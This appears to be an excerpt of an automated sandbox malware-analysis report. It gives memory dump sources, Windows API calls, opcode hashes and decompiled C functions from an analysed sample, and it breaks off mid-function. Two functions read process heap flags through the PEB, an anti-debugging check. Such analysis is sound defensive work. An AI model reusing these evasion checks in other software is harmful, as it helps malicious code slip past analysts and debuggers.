                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0042AC7A,?,?,?,?), ref: 0042A5EC
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0042A5F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,00000000,?), ref: 004361D3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019E70() {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = GetVersion();
                                                                                                                                                                  				_v12 = _v8 & 0xff;
                                                                                                                                                                  				if(_v12 != 5) {
                                                                                                                                                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0 | _v16 != 0x00000002;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019ED0() {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v8 = GetVersion();
                                                                                                                                                                  				_v12 = _v8 & 0xff;
                                                                                                                                                                  				if(_v12 != 5) {
                                                                                                                                                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0 | _v16 != 0x00000000;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  • Opcode ID: c74d15f3d28e0ff1bc9d70cdb83ca30e7064eb6c70fff7e2efc50b1375ab48fb
                                                                                                                                                                  • Instruction ID: bbca5fb05897284be9ea1cb6226a5444645e9dd890f4aab1cda7a4fe17223220
                                                                                                                                                                  • Opcode Fuzzy Hash: c74d15f3d28e0ff1bc9d70cdb83ca30e7064eb6c70fff7e2efc50b1375ab48fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0F4B5D44259EFC710DFA9C585BACB7F0EB04701F1180B9E8019B751D238DA84DF50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?,?,004291DB,00429190), ref: 0042A5CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: 45475614fb918fb5917f4b7fcb39c8f9044cee1118aa82ad42eeb9d7fd10389e
                                                                                                                                                                  • Instruction ID: b61b093a120fc264680cda8e68f3d4ad48064844732661b3e58d16a67d1dbde7
                                                                                                                                                                  • Opcode Fuzzy Hash: 45475614fb918fb5917f4b7fcb39c8f9044cee1118aa82ad42eeb9d7fd10389e
                                                                                                                                                                  • Instruction Fuzzy Hash: 19A0113000020CAB8B002B82EC0888A3F2CEA002A0F0080A0FA0C000B0CB22A8208AC8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8f7d275609c4dc4c6e39c486d0b783a9a76dd8681d75d41594741e5c26260ea0
                                                                                                                                                                  • Instruction ID: d649f76a6e59ff276ec3660bed01fd571905612ee3ad6812c74799326186f855
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7d275609c4dc4c6e39c486d0b783a9a76dd8681d75d41594741e5c26260ea0
                                                                                                                                                                  • Instruction Fuzzy Hash: 10626CB56083818FE710CF24C880A5BB7E2EFC9394F25492DF88597356DB35E949CB92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b838d7296990158abbde2e56eb50047ea9ba74e0e9c48dad81e20210eb794b7e
                                                                                                                                                                  • Instruction ID: d70dba88f28a0f8a70ad8b67316680d5ba6c29fe13a3c6e115cb22e139560ee5
                                                                                                                                                                  • Opcode Fuzzy Hash: b838d7296990158abbde2e56eb50047ea9ba74e0e9c48dad81e20210eb794b7e
                                                                                                                                                                  • Instruction Fuzzy Hash: FA02D673A0876147E759CE19CC9421EB7E3FBC03C4F2B492DE89547788DAB09A49C791
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                                  • Instruction ID: c48fee3b014ed5ff0b1584258dc90a60d0d26dad2353b18860693a8483f2b48c
                                                                                                                                                                  • Opcode Fuzzy Hash: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                                  • Instruction Fuzzy Hash: EE022932A043528BE718CE28C4D425DBBE2FBC4394F164A3EE89697788D774E945CBD1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                  • Instruction ID: a7f2b1859c4ef300092cc32dcff9c6a9dbef92b80320a811a331a3c043855861
                                                                                                                                                                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                  • Instruction Fuzzy Hash: B9D16173C0AAF3069379C62D445852EEAA2EFC16C131BC3E1DCD43F29D9A269D059AD0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                  • Instruction ID: cda0169ce49430d7313ca097b948b59d7db02125182e5faf3b14c7172c39487f
                                                                                                                                                                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                  • Instruction Fuzzy Hash: CCD17073C1AAF34A9379C62D445852EEAA2EFC16D131BC3E1DCD43F28DDA265D0496E0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00428532
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9acec095667df647dd6728c8fce2d61b27b34abd2273d8f0be62e7ed221938b4
                                                                                                                                                                  • Instruction ID: 9c83fcd19be6a3549c5094da148d1b7ef8e9631ea98a9535e41a63b7fbb91de0
                                                                                                                                                                  • Opcode Fuzzy Hash: 9acec095667df647dd6728c8fce2d61b27b34abd2273d8f0be62e7ed221938b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B313036AA09164BE70CCB28DCA7BB93291E784345F89527DEA5BCB3D1DE6C9900C744
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction ID: fd866669d7def1bd0f5e6ff0e7dfab73c60d6fbfd972b9342aebd5a2a836bdfc
                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction Fuzzy Hash: 481171B76040C283F680C93DD4B46ABE3DBEBC53E0769837AD1825B65CD222ED419500
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                                  • Instruction ID: 092e627599c260872cf77075b20de26a3c1973105b5310ece606d40c860bec08
                                                                                                                                                                  • Opcode Fuzzy Hash: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A210E729403374BE361E969DC043623392FBC4389F1A8174DE905BB4AD639AA0387D0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                                  • Instruction ID: 54160e38a87a1394f3f731265ac885514747015bc8d543b46c1dad9edca6ae3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                                  • Instruction Fuzzy Hash: 04110232A50B264EE311D97DCC90773B3D2FBC1699F5A8528EAD28330DE939AB008310
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                                  • Instruction ID: 400514f795efa1174e6a2b3ff4f6cc3dc550215f7dc1e9ae67a216db31666afb
                                                                                                                                                                  • Opcode Fuzzy Hash: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                                  • Instruction Fuzzy Hash: 65D0A93291620CEFC700CF94C902B8EB3F8E700340F1040A8E80487200D2399F10DA81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                                  • Instruction ID: afa243e2bbc7d5b73eef9c76600441106c915adb5c9f305da66005335667999b
                                                                                                                                                                  • Opcode Fuzzy Hash: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                                  • Instruction Fuzzy Hash: FCD0A92059D2CC6ECB02CBB88411BA9BFF88716600F0802C4E888C3382C02A820983A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040A79F(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				int _t158;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  				signed int _t166;
                                                                                                                                                                  				intOrPtr* _t167;
                                                                                                                                                                  				intOrPtr* _t168;
                                                                                                                                                                  				intOrPtr* _t169;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				intOrPtr _t176;
                                                                                                                                                                  				void* _t179;
                                                                                                                                                                  				void* _t188;
                                                                                                                                                                  				void* _t190;
                                                                                                                                                                  
                                                                                                                                                                  				_t174 = __edx;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t88 = E00436045(_a8, L"Registration",  &_v12);
                                                                                                                                                                  				_t164 = 0x80070490;
                                                                                                                                                                  				_t179 =  ==  ? 0x80070490 : _t88;
                                                                                                                                                                  				if(_t179 >= 0) {
                                                                                                                                                                  					_push(__edi);
                                                                                                                                                                  					_t176 = _a4;
                                                                                                                                                                  					if(E00435B5E(_v12, L"Id", _t176 + 0xc) >= 0) {
                                                                                                                                                                  						if(E00435B5E(_v12, L"Tag", _t176 + 0x10) >= 0) {
                                                                                                                                                                  							if(E00409A34(_t176, _t176, _a8) >= 0) {
                                                                                                                                                                  								if(E00435B5E(_v12, L"Version",  &_v16) >= 0) {
                                                                                                                                                                  									if(E0043720F(_t174, _v16, 0, _t176 + 0x38) >= 0) {
                                                                                                                                                                  										if(E00435B5E(_v12, L"ProviderKey", _t176 + 0x44) >= 0) {
                                                                                                                                                                  											if(E00435B5E(_v12, L"ExecutableName", _t176 + 0x48) >= 0) {
                                                                                                                                                                  												if(E00435D6C(_t166, _v12, L"PerMachine", _t176) >= 0) {
                                                                                                                                                                  													_t188 = E00436045(_v12, L"Arp",  &_v8);
                                                                                                                                                                  													if(_t188 == 1) {
                                                                                                                                                                  														L71:
                                                                                                                                                                  														if(E00409CAE(_v12, _t176 + 0x94, _t176 + 0x98) >= 0) {
                                                                                                                                                                  															_t190 = E00436045(_v12, L"Update",  &_v20);
                                                                                                                                                                  															if(_t190 == 1) {
                                                                                                                                                                  																L88:
                                                                                                                                                                  																_t190 = E0040A040(_t166, _t176);
                                                                                                                                                                  																if(_t190 >= 0) {
                                                                                                                                                                  																	L91:
                                                                                                                                                                  																	L92:
                                                                                                                                                                  																	_t167 = _v12;
                                                                                                                                                                  																	if(_t167 != 0) {
                                                                                                                                                                  																		 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t168 = _v8;
                                                                                                                                                                  																	if(_t168 != 0) {
                                                                                                                                                                  																		 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t169 = _v20;
                                                                                                                                                                  																	if(_t169 != 0) {
                                                                                                                                                                  																		 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                                                                                                                  																	}
                                                                                                                                                                  																	if(_v16 != 0) {
                                                                                                                                                                  																		E004380AB(_v16);
                                                                                                                                                                  																	}
